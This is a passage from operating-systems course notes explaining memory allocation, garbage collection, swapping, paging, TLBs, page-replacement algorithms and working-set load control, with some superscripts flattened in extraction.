any requests. This situation is called fragmentation, and is a problem for all memorymanagement strategies, although it is particularly bad for best-fit. One way to avoid making little
holes is to give the client a bigger block than it asked for. For example, we might round all
requests up to the next larger multiple of 64 bytes. That doesn't make the fragmentation go away,
47
it just hides it. Unusable space in the form of holes is called external fragmentation, while
unused space inside allocated blocks is called internal fragmentation.
Another strategy is first fit, which simply scans the free list until a large enough hole is found.
Despite the name, first-fit is generally better than best-fit because it leads to less fragmentation.
There is still one problem: Small holes tend to accumulate near the beginning of the free list,
making the memory allocator search farther and farther each time. This problem is solved with
next fit, which starts each search where the last one left off, wrapping around to the beginning
when the end of the list is reached.
Yet another strategy is to maintain separate lists, each containing holes of a different size. This
approach works well at the application level, when only a few different types of objects are
created (although there might be lots of instances of each type). It can also be used in a more
general setting by rounding all requests up to one of a few pre-determined choices. For example,
the memory manager may round all requests up to the next power of two bytes (with a minimum
of, say, 64) and then keep lists of holes of size 64, 128, 256, etc. Assuming the largest request
possible is 1 megabyte, this requires only 14 lists. This is the approach taken by most
implementations of malloc. This approach eliminates external fragmentation entirely, but internal
fragmentation may be as bad as 50% in the worst case, which occurs when all requests are one
byte more than a power of two.
Another problem with this approach is how to coalesce neighboring holes. One possibility is not
to try. The system is initialized by splitting memory up into a fixed set of holes (either all the
same size or a variety of sizes). Each request is matched to an ``appropriate'' hole. If the request
is smaller than the hole size, the entire hole is allocated to it anyhow. When the allocate block is
released, it is simply returned to the appropriate free list. Most implementations of malloc use a
variant of this approach.
An interesting trick for coalescing holes with multiple free lists is the buddy system. Assume all
blocks and holes have sizes which are powers of two and each block or hole starts at an address
that is an exact multiple of its size. Then each block has a ``buddy'' of the same size adjacent to
it, such that combining a block of size 2n with its buddy creates a properly aligned block of size
2n+1 For example, blocks of size 4 could start at addresses 0, 4, 8, 12, 16, 20, etc. The blocks at 0
and 4 are buddies; combining them gives a block at 0 of length 8. Similarly 8 and 12 are buddies,
16 and 20 are buddies, etc. The blocks at 4 and 8 are not buddies even though they are neighbors:
48
Combining them would give a block of size 8 starting at address 4, which is not a multiple of 8.
The address of a block's buddy can be easily calculated by flipping the nth bit from the right in
the binary representation of the block's address. For example, the pairs of buddies (0,4), (8,12),
(16,20) in binary are (00000,00100), (01000,01100), (10000,10100). In each case, the two
addresses in the pair differ only in the third bit from the right. In short, you can find the address
of the buddy of a block by taking the exclusive or of the address of the block with its size. To
allocate a block of a given size, first round the size up to the next power of two and look on the
list of blocks of that size. If that list is empty, split a block from the next higher list (if that list is
empty, first add two blocks to it by splitting a block from the next higher list, and so on). When
deallocating a block, first check to see whether the block's buddy is free. If so, combine the block
with its buddy and add the resulting block to the next higher free list. As with allocations,
deallocations can cascade to higher and higher lists.
Compaction and Garbage Collection
What do you do when you run out of memory? Any of these methods can fail because all the
memory is allocated, or because there is too much fragmentation. Malloc, which is being used to
allocate the data segment of a UNIX process, just gives up and calls the (expensive) OS call to
expand the data segment. A memory manager allocating real physical memory doesn't have that
luxury. The allocation attempt simply fails. There are two ways of delaying this catastrophe,
compaction and garbage collection.
Compaction attacks the problem of fragmentation by moving all the allocated blocks to one end
of memory, thus combining all the holes. Aside from the obvious cost of all that copying, there is
an important limitation to compaction: Any pointers to a block need to be updated when the
block is moved. Unless it is possible to find all such pointers, compaction is not possible.
Pointers can stored in the allocated blocks themselves as well as other places in the client of the
memory manager. In some situations, pointers can point not only to the start of blocks but also
into their bodies. For example, if a block contains executable code, a branch instruction might be
a pointer to another location in the same block. Compaction is performed in three phases. First,
the new location of each block is calculated to determine the distance the block will be moved.
Then each pointer is updated by adding to it the amount that the block it is pointing (in) to will
be moved. Finally, the data is actually moved. There are various clever tricks possible to
combine these operations.
49
Garbage collection finds blocks of memory that are inaccessible and returns them to the free list.
As with compaction, garbage collection normally assumes we find all pointers to blocks, both
within the blocks themselves and ``from the outside.'' If that is not possible, we can still do
``conservative'' garbage collection in which every word in memory that contains a value that
appears to be a pointer is treated as a pointer. The conservative approach may fail to collect
blocks that are garbage, but it will never mistakenly collect accessible blocks. There are three
main approaches to garbage collection: reference counting, mark-and-sweep, and generational
algorithms.
Reference counting keeps in each block a count of the number of pointers to the block. When the
count drops to zero, the block may be freed. This approach is only practical in situations where
there is some ``higher level'' software to keep track of the counts (it's much too hard to do by
hand), and even then, it will not detect cyclic structures of garbage: Consider a cycle of blocks,
each of which is only pointed to by its predecessor in the cycle. Each block has a reference count
of 1, but the entire cycle is garbage.
Mark-and-sweep works in two passes: First we mark all non-garbage blocks by doing a depthfirst search starting with each pointer ``from outside'':
void mark(Address b) {
mark block b;
for (each pointer p in block b) {
if (the block pointed to by p is not marked)
mark(p);
}
}
The second pass sweeps through all blocks and returns the unmarked ones to the free list. The
sweep pass usually also does compaction, as described above.
There are two problems with mark-and-sweep. First, the amount of work in the mark pass is
proportional to the amount of non-garbage. Thus if memory is nearly full, it will do a lot of work
with very little payoff. Second, the mark phase does a lot of jumping around in memory, which is
bad for virtual memory systems, as we will soon see.
The third approach to garbage collection is called generational collection. Memory is divided
into spaces. When a space is chosen for garbage collection, all subsequent references to objects
in that space cause the object to be copied to a new space. After a while, the old space either it
becomes empty and can be returned to the free list all at once, or at least it becomes so sparse
that a mark-and-sweep garbage collection on it will be cheap. As an empirical fact, objects tend
50
to be either short-lived or long-lived. In other words, an object that has survived for a while is
likely to live a lot longer. By carefully choosing where to move objects when they are
referenced, we can arrange to have some spaces filled only with long-lived objects, which are
very unlikely to become garbage.
5.2 Swapping
When all else fails, allocate simply fails. In the case of an application program, it may be
adequate to simply print an error message and exit. An OS must be able recover more gracefully.
We motivated memory management by the desire to have many processes in memory at once. In
a batch system, if the OS cannot allocate memory to start a new job, it can ``recover'' by simply
delaying starting the job. If there is a queue of jobs waiting to be created, the OS might want to
go down the list, looking for a smaller job that can be created right away. This approach
maximizes utilization of memory, but can starve large jobs. The situation is analogous to shortterm CPU scheduling, in which SJF gives optimal CPU utilization but can starve long bursts.
The same trick works here: aging. As a job waits longer and longer, increase its priority, until its
priority is so high that the OS refuses to skip over it looking for a more recently arrived but
smaller job.
An alternative way of avoiding starvation is to use a memory-allocation scheme with fixed
partitions (holes are not split or combined). Assuming no job is bigger than the biggest partition,
there will be no starvation, provided that each time a partition is freed, we start the first job in
line that is smaller than that partition. However, we have another choice analogous to the
difference between first-fit and best fit. Of course we want to use the ``best'' hole for each job
(the smallest free partition that is at least as big as the job), but suppose the next job in line is
small and all the small partitions are currently in use. We might want to delay starting that job
and look through the arrival queue for a job that better uses the partitions currently available.
This policy re-introduces the possibility of starvation, which we can combat by aging, as above.
If a disk is available, we can also swap blocked jobs out to disk. When a job finishes, we first
swap back jobs from disk before allowing new jobs to start. When a job is blocked (either
because it wants to do I/O or because our short-term scheduling algorithm says to switch to
another job), we have a choice of leaving it in memory or swapping it out. One way of looking at
this scheme is that it increases the multiprogramming level (the number of jobs ``in memory'') at
the cost of making it (much) more expensive to switch jobs. A variant of the MLFQ (multi-level
51
feedback queues) CPU scheduling algorithm is particularly attractive for this situation. The
queues are numbered from 0 up to some maximum. When a job becomes ready, it enters queue
zero. The CPU scheduler always runs a job from the lowest-numbered non-empty queue (i.e., the
priority is the negative of the queue number). It runs a job from queue i for a maximum of i
quanta. If the job does not block or complete within that time limit, it is added to the next higher
queue. This algorithm behaves like RR with short quanta in that short bursts get high priority, but
does not incur the overhead of frequent swaps between jobs with long bursts. The number of
swaps is limited to the logarithm of the burst size.
5.3 Paging
Most modern computers have special hardware called a memory management unit (MMU). This
unit sits between the CPU and the memory unit. Whenever the CPU wants to access memory
(whether it is to load an instruction or load or store data), it sends the desired memory address to
the MMU, which translates it to another address before passing it on the the memory unit. The
address generated by the CPU, after any indexing or other addressing-mode arithmetic, is called
a virtual address, and the address it gets translated to by the MMU is called a physical address.
Figure 5.2 Paging in memory management
Normally, the translation is done at the granularity of a page. Each page is a power of 2 bytes
long, usually between 1024 and 8192 bytes. If virtual address p is mapped to physical address f
(where p is a multiple of the page size), then address p+o is mapped to physical address f+o for
any offset o less than the page size. In other words, each page is mapped to a contiguous region
of physical memory called a page frame.
52
Figure 5.3 Allocation of pages in page frames
The MMU allows a contiguous region of virtual memory to be mapped to page frames scattered
around physical memory making life much easier for the OS when allocating memory. Much
more importantly, however, it allows infrequently-used pages to be stored on disk. Here's how it
works: The tables used by the MMU have a valid bit for each page in the virtual address space. If
this bit is set, the translation of virtual addresses on a page proceeds as normal. If it is clear, any
attempt by the CPU to access an address on the page generates an interrupt called a page fault
trap. The OS has an interrupt handler for page faults, just as it has a handler for any other kind of
interrupt. It is the job of this handler to get the requested page into memory.
In somewhat more detail, when a page fault is generated for page p1, the interrupt handler does
the following:

Find out where the contents of page p1 are stored on disk. The OS keeps this information
in a table. It is possible that this page isn't anywhere at all, in which case the memory
reference is simply a bug. In this case, the OS takes some corrective action such as killing
the process that made the reference (this is source of the notorious message ``memory
fault -- core dumped''). Assuming the page is on disk:

Find another page p2 mapped to some frame f of physical memory that is not used much.

Copy the contents of frame f out to disk.

Clear page p2's valid bit so that any subsequent references to page p2 will cause a page
fault.
53

Copy page p1's data from disk to frame f.

Update the MMU's tables so that page p1 is mapped to frame f.

Return from the interrupt, allowing the CPU to retry the instruction that caused the
interrupt.
Page Tables
Conceptually, the MMU contains a page table which is simply an array of entries indexed by
page number. Each entry contains some flags (such as the valid bit mentioned earlier) and a
frame number. The physical address is formed by concatenating the frame number with the
offset, which are the low-order bits of the virtual address.
Figure 5.4 Pages table management (a)
There are two problems with this conceptual view. First, the lookup in the page table has to be
fast, since it is done on every single memory reference--at least once per instruction executed (to
fetch the instruction itself) and often two or more times per instruction. Thus the lookup is
always done by special-purpose hardware. Even with special hardware, if the page table is stored
in memory, the table lookup makes each memory reference generated by the CPU cause two
references to memory. Since in modern computers, the speed of memory is often the bottleneck
(processors are getting so fast that they spend much of their time waiting for memory), virtual
memory could make programs run twice as slowly as they would without it. We will look at
ways of avoiding this problem in a minute, but first we will consider the other problem: The page
tables can get large.
Suppose the page size is 4K bytes and a virtual address is 32 bits long (these are typical values
for current machines). Then the virtual address would be divided into a 20-bit page number and a
12-bit offset (because 212 = 4096 = 4K), so the page table would have to have 220 = 1,048,576
entries. If each entry is 4 bytes long, that would use up 4 megabytes of memory. And each
54
process has its own page table. Newer machines being introduced now generate 64-bit addresses.
Such a machine would need a page table with 4,503,599,627,370,496 entries!
Fortunately, the vast majority of the page table entries are normally marked ``invalid.'' Although
the virtual address may be 32 bits long and thus capable of addressing a virtual address space of
4 gigabytes, a typical process is at most a few megabytes in size, and each megabyte of virtual
memory uses only 256 page-table entries (for 4K pages).
There are several different page table organizations use in actual computers. One approach is to
put the page table entries in special registers. This was the approach used by the PDP-11
minicomputer introduced in the 1970's. The virtual address was 16 bits and the page size was 8K
bytes. Thus the virtual address consisted of 3 bits of page number and 13 bits of offset, for a total
of 8 pages per process. The eight page-table entries were stored in special registers. As an aside,
16-bit virtual addresses mean that any one process could access only 64K bytes of memory. Even
in those days that was considered too small, so later versions of the PDP-11 used a trick called
``split I/D space.'' Each memory reference generated by the CPU had an extra bit indicating
whether it was an instruction fetch (I) or a data reference (D), thus allowing 64K bytes for the
program and 64K bytes for the data. Putting page table entries in registers helps make the MMU
run faster (the registers were much faster than main memory), but this approach has a downside
as well. The registers are expensive, so it works for very small page-table size. Also, each time
the OS wants to switch processes, it has to reload the registers with the page-table entries of the
new process.
A second approach is to put the page table in main memory. The (physical) address of the page
table is held in a register. The page field of the virtual address is added to this register to find the
page table entry in physical memory. This approach has the advantage that switching processes
is easy (all you have to do is change the contents of one register) but it means that every memory
reference generated by the CPU requires two trips to memory. It also can use too much memory,
as we saw above.
A third approach is to put the page table itself in virtual memory. The page number extracted
from the virtual address is used as a virtual address to find the page table entry. To prevent an
infinite recursion, this virtual address is looked up using a page table stored in physical memory.
As a concrete example, consider the VAX computer, introduced in the late 70's. The virtual
address of the VAX is 30 bits long, with 512-byte pages (probably too small even at that time!)
55
Thus the virtual address a consists of a 21-bit page number p and a nine-bit offset o. The page
number is multiplied by 4 (the size of a page-table entry) and added to the contents of the MMU
register containing the address of the page table. This gives a virtual address that is resolved
using a page table in physical memory to get a frame number f1. In more detail, the high order
bits of p index into a table to find a physical frame number, which, when concatenated with the
low bits of p give the physical address of a word containing f. The concatenation of f with o is
the desired physical address.
Figure 5.5 Pages table management (b)
As you can see, another way of looking at this algorithm is that the virtual address is split into
fields that are used to walk through a tree of page tables. The SPARC processor (which you are
using for this course) uses a similar technique, but with one more level: The 32-bit virtual
address is divided into three index fields of 8, 6, and 6 bits and a 12-bit offset. The root of the
tree is pointed to by an entry in a context table, which has one entry for each process. The
advantage of these schemes is that they save on memory. For example, consider a VAX process
that only uses the first megabyte of its address space (2048 512-byte pages). Since each second
level page table has 128 entries, there will be 16 of them used. Adding to this the 64K bytes
needed for the first-level page table, the total space used for page tables is only 72K bytes, rather
than the 8 megabytes that would be needed for a one-level page table. The downside is that each
level of page table adds one more memory lookup on each reference generated by the CPU.
A fourth approach is to use what is called an inverted page table. (Actually, the very first
computer to have virtual memory, the Atlas computer built in England in the late 50's used this
approach, so in some sense all the page tables described above are ``inverted.'') An ordinary page
table has an entry for each page, containing the address of the corresponding page frame (if any).
An inverted page table has an entry for each page frame, containing the corresponding page
number. To resolve a virtual address, the table is searched to find an entry that contains the page
number. The good news is that an inverted page table only uses a fixed fraction of memory. For
56
example, if a page is 4K bytes and a page-table entry is 4 bytes, there will be exactly 4 bytes of
page table for each 4096 bytes of physical memory. In other words, less that 0.1% of memory
will be used for page tables. The bad news is that this is by far the slowest of the methods, since
it requires a search of the page table for each reference. The original Atlas machine had special
hardware to search the table in parallel, which was reasonable since the table had only 2048
entries.
All of the methods considered thus far can be sped up by using a trick called caching. We will be
seeing many many more examples of caching used to speed things up throughout the course. In
fact, it has been said that caching is the only technique in computer science used to improve
performance. In this case, the specific device is called a translation lookaside buffer (TLB). The
TLB contains a set of entries, each of which contains a page number, the corresponding page
frame number, and the protection bits. There is special hardware to search the TLB for an entry
matching a given page number. If the TLB contains a matching entry, it is found very quickly
and nothing more needs to be done. Otherwise we have a TLB miss and have to fall back on one
of the other techniques to find the translation. However, we can take that translation we found
the hard way and put it into the TLB so that we find it much more quickly the next time. The
TLB has a limited size, so to add a new entry, we usually have to throw out an old entry. The
usual technique is to throw out the entry that hasn't been used the longest. This strategy, called
LRU (least-recently used) replacement is also implemented in hardware. The reason this
approach works so well is that most programs spend most of their time accessing a small set of
pages over and over again. For example, a program often spends a lot of time in an ``inner loop''
in one procedure. Even if that procedure, the procedures it calls, and so on are spread over 40K
bytes, 10 TLB entries will be sufficient to describe all these pages, and there will no TLB misses
provided the TLB has at least 10 entries. This phenomenon is called locality. In practice, the TLB
hit rate for instruction references is extremely high. The hit rate for data references is also good,
but can vary widely for different programs.
If the TLB performs well enough, it almost doesn't matter how TLB misses are resolved. The
IBM Power PC and the HP Spectrum use inverted page tables organized as hash tables in
conjunction with a TLB. The MIPS computers (MIPS is now a division of Silicon Graphics) get
rid of hardware page tables altogether. A TLB miss causes an interrupt, and it is up to the OS to
search the page table and load the appropriate entry into the TLB. The OS typically uses an
inverted page table implemented as a software hash table.
57
Two processes may map the same page number to different page frames. Since the TLB
hardware searches for an entry by page number, there would be an ambiguity if entries
corresponding to two processes were in the TLB at the same time. There are two ways around
this problem. Some systems simply flush the TLB (set a bit in all entries marking them as
unused) whenever they switch processes. This is very expensive, not because of the cost of
flushing the TLB, but because of all the TLB misses that will happen when the new process
starts running. An alternative approach is to add a process identifier to each entry. The hardware
then searches on for the concatenation of the page number and the process id of the current
process.
We mentioned earlier that each page-table entry contains a ``valid'' bit as well as some other bits.
These other bits include the following.

Protection. At a minimum one bit to flag the page as read-only or read/write. Sometimes
more bits to indicate whether the page may be executed as instructions, etc.

Modified. This bit, usually called the dirty bit, is set whenever the page is referenced by a
write (store) operation.

Referenced. This bit is set whenever the page is referenced for any reason, whether load
or store. We will see in the next section how these bits are used.
Page Replacement
All of these hardware methods for implementing paging have one thing in common: When the
CPU generates a virtual address for which the corresponding page table entry is marked invalid,
the MMU generates a page fault interrupt and the OS must handle the fault as explained above.
The OS checks its tables to see why it marked the page as invalid. There are (at least) three
possible reasons:

There is a bug in the program being run. In this case the OS simply kills the program
(``memory fault -- core dumped'').

UNIX treats a reference just beyond the end of a process' stack as a request to grow the
stack. In this case, the OS allocates a page frame, clears it to zeros, and updates the
MMU's page tables so that the requested page number points to the allocated frame.
58

The requested page is on disk but not in memory. In this case, the OS allocates a page
frame, copies the page from disk into the frame, and updates the MMU's page tables so
that the requested page number points to the allocated frame.
In all but the first case, the OS is faced with the problem of choosing a frame. If there are any
unused frames, the choice is easy, but that will seldom be the case. When memory is heavily
used, the choice of frame is crucial for decent performance.
We will first consider page-replacement algorithms for a single process, and then consider
algorithms to use when there are multiple processes, all competing for the same set of frames.
Frame Allocation for a Single Process

FIFO. (First-in, first-out) Keep the page frames in an ordinary queue, moving a frame to
the tail of the queue when it it loaded with a new page, and always choose the frame at
the head of the queue for replacement. In other words, use the frame whose page has been
in memory the longest. While this algorithm may seem at first glance to be reasonable, it
is actually about as bad as you can get. The problem is that a page that has been memory
for a long time could equally likely be ``hot'' (frequently used) or ``cold'' (unused), but
FIFO treats them the same way. In fact FIFO is no better than, and may indeed be worse
than

RAND. (Random) Simply pick a random frame. This algorithm is also pretty bad.

OPT. (Optimum) Pick the frame whose page will not be used for the longest time in the
future. If there is a page in memory that will never be used again, it's frame is obviously
the best choice for replacement. Otherwise, if (for example) page A will be next
referenced 8 million instructions in the future and page B will be referenced 6 million
instructions in the future, choose page A. This algorithm is sometimes called Belady's
MIN algorithm after its inventor. It can be shown that OPT is the best possible algorithm,
in the sense that for any reference string (sequence of page numbers touched by a
process), OPT gives the smallest number of page faults. Unfortunately, OPT, like SJF
processor scheduling, is unimplementable because it requires knowledge of the future. It's
only use is as a theoretical limit. If you have an algorithm you think looks promising, see
how it compares to OPT on some sample reference strings.
59

LRU. (Least Recently Used) Pick the frame whose page has not been referenced for the
longest time. The idea behind this algorithm is that page references are not random.
Processes tend to have a few hot pages that they reference over and over again. A page
that has been recently referenced is likely to be referenced again in the near future. Thus
LRU is likely to approximate OPT. LRU is actually quite a good algorithm. There are
two ways of finding the least recently used page frame. One is to maintain a list. Every
time a page is referenced, it is moved to the head of the list. When a page fault occurs, the
least-recently used frame is the one at the tail of the list. Unfortunately, this approach
requires a list operation on every single memory reference, and even though it is a pretty
simple list operation, doing it on every reference is completely out of the question, even
if it were done in hardware. An alternative approach is to maintain a counter or timer, and
on every reference store the counter into a table entry associated with the referenced
frame. On a page fault, search through the table for the smallest entry. This approach
requires a search through the whole table on each page fault, but since page faults are
expected to tens of thousands of times less frequent than memory references, that's ok. A
clever variant on this scheme is to maintain an n by n array of bits, initialized to 0, where
n is the number of page frames. On a reference to page k, first set all the bits in row k to 1
and then set all bits in column k to zero. It turns out that if row k has the smallest value
(when treated as a binary number), then frame k is the least recently used.
Unfortunately, all of these techniques require hardware support and nobody makes
hardware that supports them. Thus LRU, in its pure form, is just about as impractical as
OPT. Fortunately, it is possible to get a good enough approximation to LRU (which is
probably why nobody makes hardware to support true LRU).

NRU. (Not Recently Used) There is a form of support that is almost universally provided
by the hardware: Each page table entry has a referenced bit that is set to 1 by the
hardware whenever the entry is used in a translation. The hardware never clears this bit to
zero, but the OS software can clear it whenever it wants. With NRU, the OS arranges for
periodic timer interrupts (say once every millisecond) and on each ``tick,'' it goes through
the page table and clears all the referenced bits. On a page fault, the OS prefers frames
whose referenced bits are still clear, since they contain pages that have not been
referenced since the last timer interrupt. The problem with this technique is that the
60
granularity is too coarse. If the last timer interrupt was recent, all the bits will be clear
and there will be no information to distinguished frames from each other.

SLRU. (Sampled LRU) This algorithm is similar to NRU, but before the referenced bit
for a frame is cleared it is saved in a counter associated with the frame and maintained in
software by the OS. One approach is to add the bit to the counter. The frame with the
lowest counter value will be the one that was referenced in the smallest number of recent
``ticks''. This variant is called NFU (Not Frequently Used). A better approach is to shift
the bit into the counter (from the left). The frame that hasn't been reference for the largest
number of ``ticks'' will be associated with the counter that has the largest number of
leading zeros. Thus we can approximate the least-recently used frame by selecting the
frame corresponding to the smallest value (in binary). (That will select the frame
unreferenced for the largest number of ticks, and break ties in favor of the frame longest
unreferenced before that). This only approximates LRU for two reasons: It only records
whether a page was referenced during a tick, not when in the tick it was referenced, and it
only remembers the most recent n ticks, where n is the number of bits in the counter. We
can get as close an approximation to true LRU as we like, at the cost of increasing the
overhead, by making the ticks short and the counters very long.

Second Chance. When a page fault occurs, look at the page frames one at a time, in order
of their physical addresses. If the referenced bit is clear, choose the frame for
replacement, and return. If the referenced bit is set, give the frame a ``second chance'' by
clearing its referenced bit and going on to the next frame (wrapping around to frame zero
at the end of memory). Eventually, a frame with a zero referenced bit must be found,
since at worst, the search will return to where it started. Each time this algorithm is
called, it starts searching where it last left off. This algorithm is usually called CLOCK
because the frames can be visualized as being around the rim of an (analogue) clock, with
the current location indicated by the second hand.
We have glossed over some details here. First, we said that when a frame is selected for
replacement, we have to copy its contents out to disk. Obviously, we can skip this step if the
page frame is unused. We can also skip the step if the page is ``clean,'' meaning that it has not
been modified since it was read into memory. Most MMU's have a dirty bit associated with each
page. When the MMU is setting the referenced bit for a page, it also sets the dirty bit if the
61
reference is a write (store) reference. Most of the algorithms above can be modified in an
obvious way to prefer clean pages over dirty ones. For example, one version of NRU always
prefers an unreferenced page over a referenced one, but with one category, it prefers clean over
dirty pages. The CLOCK algorithm skips frames with either the referenced or the dirty bit set.
However, when it encounters a dirty frame, it starts a disk-write operation to clean the frame.
With this modification, we have to be careful not to get into an infinite loop. If the hand makes a
complete circuit finding nothing but dirty pages, the OS simply has to wait until one of the pagecleaning requests finishes. Hopefully, this rarely if ever happens.
There is a curious phenomenon called Belady's Anomaly that comes up in some algorithms but
not others. Consider the reference string (sequence of page numbers) 0 1 2 3 0 1 4 0 1 2 3 4. If
we use FIFO with three page frames, we get 9 page faults, including the three faults to bring in
the first three pages, but with more memory (four frames), we actually get more faults (10).
Frame Allocation for Multiple Processes
Up to this point, we have been assuming that there is only one active process. When there are
multiple processes, things get more complicated. Algorithms that work well for one process can
give terrible results if they are extended to multiple processes in a naive way.
LRU would give excellent results for a single process, and all of the good practical algorithms
can be seen as ways of approximating LRU. A straightforward extension of LRU to multiple
processes still chooses the page frame that has not been referenced for the longest time.
However, that is a lousy idea. Consider a workload consisting of two processes. Process A is
copying data from one file to another, while process B is doing a CPU-intensive calculation on a
large matrix. Whenever process A blocks for I/O, it stops referencing its pages. After a while
process B steals all the page frames away from A. When A finally finishes with an I/O operation,
it suffers a series of page faults until it gets back the pages it needs, then computes for a very
short time and blocks again on another I/O operation.
There are two problems here. First, we are calculating the time since the last reference to a page
incorrectly. The idea behind LRU is ``use it or lose it.'' If a process hasn't referenced a page for a
long time, we take that as evidence that it doesn't want the page any more and re-use the frame
for another purpose. But in a multiprogrammed system, there may be two different reasons why
a process isn't touching a page: because it is using other pages, or because it is blocked. Clearly,
a process should only be penalized for not using a page when it is actually running. To capture
62
this idea, we introduce the notion of virtual time. The virtual time of a process is the amount of
CPU time it has used thus far. We can think of each process as having its own clock, which runs
only while the process is using the CPU. It is easy for the CPU scheduler to keep track of virtual
time. Whenever it starts a burst running on the CPU, it records the current real time. When an
interrupt occurs, it calculates the length of the burst that just completed and adds that value to the
virtual time of the process that was running. An implementation of LRU should record which
process owns each page, and record the virtual time its owner last touched it. Then, when
choosing a page to replace, we should consider the difference between the timestamp on a page
and the current virtual time of the page's owner. Algorithms that attempt to approximate LRU
should do something similar.
There is another problem with our naive multi-process LRU. The CPU-bound process B has an
unlimited appetite for pages, whereas the I/O-bound process A only uses a few pages. Even if we
calculate LRU using virtual time, process B might occasionally steal pages from A. Giving more
pages to B doesn't really help it run any faster, but taking from A a page it really needs has a
severe effect on A. A moment's thought shows that an ideal page-replacement algorithm for this
particular load would divide into two pools. Process A would get as many pages as it needs and
B would get the rest. Each pool would be managed LRU separately. That is, whenever B page
faults, it would replace the page in its pool that hadn't been referenced for the longest time.
In general, each process has a set of pages that it is actively using. This set is called the working
set of the process. If a process is not allocated enough memory to hold its working set, it will
cause an excessive number of page faults. But once a process has enough frames to hold its
working set, giving it more memory will have little or no effect.
Figure 5.6 Page frame allocation vs page fault rate
More formally, given a number τ, the working set with parameter τ of a process, denoted Wτ, is
the set of pages touched by the process during its most recent τ references to memory. Because
most processes have a very high degree of locality, the size of τ is not very important provided
63
it's large enough. A common choice of τ is the number of instructions executed in 1/2 second. In
other words, we will consider the working set of a process to be the set of pages it has touched
during the previous 1/2 second of virtual time. The Working Set Model of program behavior says
that the system will only run efficiently if each process is given enough page frames to hold its
working set. What if there aren't enough frames to hold the working sets of all processes? In this
case, memory is over-committed and it is hopeless to run all the processes efficiently. It would be
better to simply stop one of the processes and give its pages to others.
Another way of looking at this phenomenon is to consider CPU utilization as a function of the
level of multiprogramming (number of processes). With too few processes, we can't keep the
CPU busy. Thus as we increase the number of processes, we would like to see the CPU
utilization steadily improve, eventually getting close to 100%. Realistically, we cannot expect to
quite that well, but we would still expect increasing performance when we add more processes.
Figure 5.7 Number of process vs CPU utilization (a)
Unfortunately, if we allow memory to become over-committed, something very different may
happen:
Figure 5.8 Number of process vs CPU utilization (b)
After a point, adding more processes doesn't help because the new processes do not have enough
memory to run efficiently. They end up spending all their time page-faulting instead of doing
useful work. In fact, the extra page-fault load on the disk ends up slowing down other processes
64
until we reach a point where nothing is happening but disk traffic. This phenomenon is called
thrashing.
The moral of the story is that there is no point in trying to run more processes than will fit in
memory. When we say a process ``fits in memory,'' we mean that enough page frames have been
allocated to it to hold all of its working set. What should we do when we have more processes
than will fit? In a batch system (one were users drop off their jobs and expect them to be run
some time in the future), we can just delay starting a new job until there is enough memory to
hold its working set. In an interactive system, we may not have that option. Users can start
processes whenever they want. We still have the option of modifying the scheduler however. If
we decide there are too many processes, we can stop one or more processes (tell the scheduler
not to run them). The page frames assigned to those processes can then be taken away and given
to other processes. It is common to say the stopped processes have been ``swapped out'' by
analogy with a swapping system, since all of the pages of the stopped processes have been
moved from main memory to disk. When more memory becomes available (because a process
has terminated or because its working set has become smaller) we can ``swap in'' one of the
stopped processes. We could explicitly bring its working set back into memory, but it is
sufficient (and usually a better idea) just to make the process runnable. It will quickly bring its
working set back into memory simply by causing page faults. This control of the number of
active processes is called load control. It is also sometimes called medium-term scheduling as
contrasted with long-term scheduling, which is concerned with deciding when to start a new job,
and short-term scheduling, which determines how to allocate the CPU resource among the
currently active jobs.
It cannot be stressed too strongly that load control is an essential component of any good pagereplacement algorithm. When a page fault occurs, we want to make a good decision on which
page to replace. But sometimes no decision is good, because there simply are not enough page
frames. At that point, we must decide to run some of the processes well rather than run all of
them very poorly.
This is a very good model, but it doesn't immediately translate into an algorithm. Various
specific algorithms have been proposed. As in the single process case, some are theoretically
good but unimplementable, while others are easy to implement but bad. The trick is to find a
reasonable compromise.
65

Fixed Allocation. Give each process a fixed number of page frames. When a page fault
occurs use LRU or some approximation to it, but only considers frames that belong to the
faulting process. The trouble with this approach is that it is not at all obvious how to
decide how many frames to allocate to each process. If you give a process too few
frames, it will thrash. If you give it too many, the extra frames are wasted; you would be
better off giving those frames to another process, or starting another job (in a batch
system). In some environments, it may be possible to statically estimate the memory
requirements of each job. For example, a real-time control system tends to run a fixed
collection of processes for a very long time. The characteristics of each process can be
carefully measured and the system can be tuned to give each process exactly the amount
of memory it needs. Fixed allocation has also been tried with batch systems: Each user is
required to declare the memory allocation of a job when it is submitted. The customer is
charged both for memory allocated and for I/O traffic, including traffic caused by page
faults. The idea is that the customer has the incentive to declare the optimum size for his
job. Unfortunately, even assuming good will on the part of the user, it can be very hard to
estimate the memory demands of a job. Besides, the working-set size can change over the
life of the job.

Page-Fault Frequency (PFF). This approach is similar to fixed allocation, but the
allocations are dynamically adjusted. The OS continuously monitors the fault rate of each
process, in page faults per second of virtual time. If the fault rate of a process gets too
high, either give it more pages or swap it out. If the fault rate gets too low, take some
pages away. When you get back enough pages this way, either start another job (in a
batch system) or restart some job that was swapped out. This technique is actually used in
some existing systems. The problem is choosing the right values of ``too high'' and ``too
low.'' You also have to be careful to avoid an unstable system, where you are continually
stealing pages from a process until it thrashes and then giving them back.

Working Set. The Working Set (WS) algorithm (as contrasted with the working set
model) is as follows: Constantly monitor the working set (as defined above) of each
process. Whenever a page leaves the working set, immediately take it away from the
process and add its frame to a pool of free frames. When a process page faults, allocate it
a frame from the pool of free frames. If the pool becomes empty, we have an overload
situation--the sum of the working set sizes of the active processes exceeds the size of
66
physical memory--so one of the processes is stopped. The problem is that WS, like SJF or
true LRU, is not implementable. A page may leave a process' working set at any time, so
the WS algorithm would require the working set to be monitored on every single memory
reference. That's not something that can be done by software, and it would be totally
impractical to build special hardware to do it. Thus all good multi-process paging
algorithms are essentially approximations to WS.

Clock. Some systems use a global CLOCK algorithm, with all frames, regardless of
current owner, included in a single clock. As we said above, CLOCK approximates LRU,
so global CLOCK approximates global LRU, which, as we said, is not a good algorithm.
However, by being a little careful, we can fix the worst failing of global clock. If the
clock ``hand'' is moving too ``fast'' (i.e., if we have to examine too many frames before
finding one to replace on an average call), we can take that as evidence that memory is
over-committed and swap out some process.
WSClock. An interesting algorithm has been proposed (but not, to the best of my
knowledge widely implemented) that combines some of the best features of WS and
CLOCK. Assume that we keep track of the current virtual time VT(p) of each process p.
Also assume that in addition to the reference and dirty bits maintained by the hardware
for each page frame i, we also keep track of process[i] (the identity of process that owns
the page currently occupying the frame) and LR[i] (an approximation to the time of the
last reference to the frame). The time stamp LR[i] is expressed as the last reference time
according to the virtual time of the process that owns the frame.
